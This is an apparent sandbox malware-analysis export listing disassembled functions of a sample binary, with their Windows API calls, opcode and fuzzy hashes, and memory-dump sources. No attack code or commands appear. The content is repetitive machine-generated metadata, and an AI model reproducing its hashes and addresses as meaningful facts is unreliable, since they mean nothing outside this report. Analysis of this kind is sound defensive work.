Opcode ID: 10b9bdf4a2d050ef51253b6b4f1c9aef9cb01523206c6fa1c950150f84aafd07
Instruction ID: ad4851a6a7ca9cb6ad612bf2d1311660681d6a779db4f67d8efe35645e489054
Opcode Fuzzy Hash: 10b9bdf4a2d050ef51253b6b4f1c9aef9cb01523206c6fa1c950150f84aafd07
Instruction Fuzzy Hash: 2741AC35504159FFDB159F68C844FEDBBB4FB45320F20439AF928922A0C734A994DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00C16920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00C169A9
TranslateMessage.USER32(?), ref: 00C169D2
DispatchMessageW.USER32(?), ref: 00C169DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C169EB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 8ff20cc3bf6031681aad12b27d622c92f74f0d58ca1f36ca4290982dd18b702a
Instruction ID: 9d4c65c5eb25e5a692a84112c5b336f208c8340bb5188d252297024bce61c872
Opcode Fuzzy Hash: 8ff20cc3bf6031681aad12b27d622c92f74f0d58ca1f36ca4290982dd18b702a
Instruction Fuzzy Hash: F831AE71900256ABDB20CF75DC44FFABBA8AB03304F1481A9E425D61A1E73499C6FBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C18F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C18F12
PostMessageW.USER32(?,00000201,00000001), ref: 00C18FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C18FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00C18FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C18FDA

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: d29d2175773e6ff429d3a9e76de5ce537541f457018c31704e201fa99a824cdf
Instruction ID: e9bb8cebf4199543552694ba8af4ebee8ae643013ab59f7c323c5d46a55271b6
Opcode Fuzzy Hash: d29d2175773e6ff429d3a9e76de5ce537541f457018c31704e201fa99a824cdf
Instruction Fuzzy Hash: 5A31DF71904219EBDB00CFA8D948BDE7BB6FB06315F104229F924A61D0C7B09A59EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

GetWindowLongW.USER32(?,000000F0), ref: 00C4B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C4B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C4B489
GetSystemMetrics.USER32(00000004), ref: 00C4B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C31184,00000000), ref: 00C4B4D0

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 022190fb3e4d5c0e3095a754c615579af21d694d38da41a6b144244d549bea7d
Instruction ID: ecac56ea3d0eaf5bf3640b313c07dd1592a0213c66c145f7e4683a970b9b54d9
Opcode Fuzzy Hash: 022190fb3e4d5c0e3095a754c615579af21d694d38da41a6b144244d549bea7d
Instruction Fuzzy Hash: 04217A71A10265AFCB249F399C08B6A3BA4FB05720F155B38F936D62E2E730DD11DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC134D
SelectObject.GDI32(?,00000000), ref: 00BC135C
BeginPath.GDI32(?), ref: 00BC1373
SelectObject.GDI32(?,00000000), ref: 00BC139C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 9b5123e65b1fe4f4e043f6a38abc96b776bee91499796fe5fd60039b33e45266
Instruction ID: ba09f289d1357916f570b9804a2e20ca5d3c705b617479edb00ec6df0a9b66ea
Opcode Fuzzy Hash: 9b5123e65b1fe4f4e043f6a38abc96b776bee91499796fe5fd60039b33e45266
Instruction Fuzzy Hash: 27217170800248EFDB108F69DC08B6D7BF8FB42325F14866AF818A61E1D7719C95DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C1C176
_memcmp.LIBCMT ref: 00C1C194
_memcmp.LIBCMT ref: 00C1C1A7
_memcmp.LIBCMT ref: 00C1C1BF
_memcmp.LIBCMT ref: 00C1C1D7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fc30895e64dc62631aec77d295d65379033b76379626a5b293fc6b433e6a4166
Instruction ID: 4624f0e634e00e14cdec69c1dc3c5a24422059443943295c56a5d2c3da894e8b
Opcode Fuzzy Hash: fc30895e64dc62631aec77d295d65379033b76379626a5b293fc6b433e6a4166
Instruction Fuzzy Hash: AE01B5B26C41057FE204A6265CC2FEF73DC9B23394F644025FD1496283E764EFA592E5

Uniqueness

Uniqueness Score: -1.00%

Function 00C24D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C24D5C
__beginthreadex.LIBCMT ref: 00C24D7A
MessageBoxW.USER32(?,?,?,?), ref: 00C24D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C24DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C24DAC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 107e531f014330998463604b9d3fd67a11926d486fb4370a2fdb6ac331e049c1
Instruction ID: 8bfbd1746c64a0d6f8102d24ac38bfcc0213dd44670aebef9525f4fc920774fe
Opcode Fuzzy Hash: 107e531f014330998463604b9d3fd67a11926d486fb4370a2fdb6ac331e049c1
Instruction Fuzzy Hash: A11104B6904259FBC7019FB8EC08BEF7FACEB45320F1442A9F924D7291D6758D008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C1874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C18766
GetLastError.KERNEL32(?,00C1822A,?,?,?), ref: 00C18770
GetProcessHeap.KERNEL32(00000008,?,?,00C1822A,?,?,?), ref: 00C1877F
HeapAlloc.KERNEL32(00000000,?,00C1822A,?,?,?), ref: 00C18786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C1879D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 5a8c03583b7987dda8a71592d1b44100ef53a55da319621f2e7891be090786af
Instruction ID: 1180186d24346aa1ffcbf48aa333a1fbec0a9172b37c05174cee4952e1b76510
Opcode Fuzzy Hash: 5a8c03583b7987dda8a71592d1b44100ef53a55da319621f2e7891be090786af
Instruction Fuzzy Hash: 35014B75604204EFDB205FA6DC88EAF7FACFF8A355B200429F949C2260DA318D45DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C254E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C25510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C25522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C2555E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 47d4579409a89a2f799bc48f03351adfeee2e78bbf87a1da75f2e12d59f527c0
Instruction ID: 0d1819389fcefa084ac6db8d627966513581ae5074036c4220cda937fc9c050e
Opcode Fuzzy Hash: 47d4579409a89a2f799bc48f03351adfeee2e78bbf87a1da75f2e12d59f527c0
Instruction Fuzzy Hash: D8011B35D00A29DBCF10EFE9E888BEEBBB9BB0A711F00006AE911B2554DB705655C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C17652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?,?,?,00C1799D), ref: 00C1766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?,?), ref: 00C1768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?,?), ref: 00C17698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?), ref: 00C176A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?,?), ref: 00C176B4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 184b3afd30ade610c25073702db372630be399888af3398b6c6e17fccc370555
Instruction ID: 20c130f2f589acdf1ff0099176928ca6431eee46fb5184d0c4895d0b89927fa2
Opcode Fuzzy Hash: 184b3afd30ade610c25073702db372630be399888af3398b6c6e17fccc370555
Instruction Fuzzy Hash: A0017176601604ABDB109F58DC48BAE7BBDEB47751F140128FD04D7221E771DE81A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C185F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C18608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C18612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C18621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C18628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C1863E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4c6c3af7f6f812b031dab592a91f6fced3ca9182b30d303f1d15e08495276c35
Instruction ID: bf37cd6965780423fb99a417538a2bf509b9415958eb7eb28b3ab940388ac2a4
Opcode Fuzzy Hash: 4c6c3af7f6f812b031dab592a91f6fced3ca9182b30d303f1d15e08495276c35
Instruction Fuzzy Hash: 8BF06235205204AFEB200FA5DC8DFAF3BACFF8B754B000429F945C6150CB719D86EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C18652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C18673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1869F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2d9878dd9d24fe6d49e7fc045027fb936c8a2e4c5c91ea671785e659ed25def3
Instruction ID: 43a882d6053180fb41430d6b1684c53e66c251d55995d008123c9ed154023d70
Opcode Fuzzy Hash: 2d9878dd9d24fe6d49e7fc045027fb936c8a2e4c5c91ea671785e659ed25def3
Instruction Fuzzy Hash: 80F04F79244204AFEB211FA5EC88FAF3BACFF8B754B100029F955C6250CA659946EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C1C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C1C6D1
MessageBeep.USER32(00000000), ref: 00C1C6E9
KillTimer.USER32(?,0000040A), ref: 00C1C705
EndDialog.USER32(?,00000001), ref: 00C1C71F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: d62db431e3b23c98056f65628ce842cc98bd809cf30e8fc8c2eb04da25cd4c24
Instruction ID: 9af52e64962dcc9196754b00f8996f09d5d3b781f01db11c60be2b5fd26c6246
Opcode Fuzzy Hash: d62db431e3b23c98056f65628ce842cc98bd809cf30e8fc8c2eb04da25cd4c24
Instruction Fuzzy Hash: 9201A234440704ABEB205B20DD8EFEA77B8FF02701F0006ADF552A14E0DBE0A9959F80

Uniqueness

Uniqueness Score: -1.00%

Function 00BC13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00BC13BF
StrokeAndFillPath.GDI32(?,?,00BFBAD8,00000000,?), ref: 00BC13DB
SelectObject.GDI32(?,00000000), ref: 00BC13EE
DeleteObject.GDI32 ref: 00BC1401
StrokePath.GDI32(?), ref: 00BC141C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 7dabca95c7248f921bf70fca3f698af7183694f722a37967a2caa567e59cfed1
Instruction ID: ee02b27dd099620977d6e9a4e48aa6890f856695073f8644d727585f2d6ffe1c
Opcode Fuzzy Hash: 7dabca95c7248f921bf70fca3f698af7183694f722a37967a2caa567e59cfed1
Instruction Fuzzy Hash: 41F0C434004248EBDB259F6AEC4DB5C3BE4FB42326F148268E469991F2C7318996DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00C2C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C2C69D
CoCreateInstance.OLE32(00C52D6C,00000000,00000001,00C52BDC,?), ref: 00C2C6B5

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

CoUninitialize.OLE32 ref: 00C2C922

Strings

.lnk, xrefs: 00C2C631, 00C2C659, 00C2C663

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 8735ca3b61a72a66f8ea630b589b01824d8d06f3ca9f570dd50f97cee79b8938
Instruction ID: 7f86b9fa3646caea1bb8c718215bd307240f2f5c0e2c5f96dc66849bb5b8b946
Opcode Fuzzy Hash: 8735ca3b61a72a66f8ea630b589b01824d8d06f3ca9f570dd50f97cee79b8938
Instruction Fuzzy Hash: E2A11971108205AFD700EF64C8C5EAFB7E8EF95704F00496CF1969B1A2EB71EA49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BD2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00BE0FF6: std::exception::exception.LIBCMT ref: 00BE102C
Part of subcall function 00BE0FF6: __CxxThrowException@8.LIBCMT ref: 00BE1041

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00BC7BB1: _memmove.LIBCMT ref: 00BC7C0B

__swprintf.LIBCMT ref: 00BD302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BD2EC6

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 3c25ab685b4b066864a484272ea47db10043d269377d753e2b9203a736c5f97c
Instruction ID: fbe4789dfdab243ac645470a20a63383f6d4a3ed6edefbbdc6454e96a23ff5c6
Opcode Fuzzy Hash: 3c25ab685b4b066864a484272ea47db10043d269377d753e2b9203a736c5f97c
Instruction Fuzzy Hash: E9918D311082429FC728EF24D895E6EB7E4EF85750F04499EF4569B2A2EF70EE44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C2BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC48A1,?,?,00BC37C0,?), ref: 00BC48CE

CoInitialize.OLE32(00000000), ref: 00C2BC26
CoCreateInstance.OLE32(00C52D6C,00000000,00000001,00C52BDC,?), ref: 00C2BC3F
CoUninitialize.OLE32 ref: 00C2BC5C

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

Strings

.lnk, xrefs: 00C2BC08, 00C2BC16

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
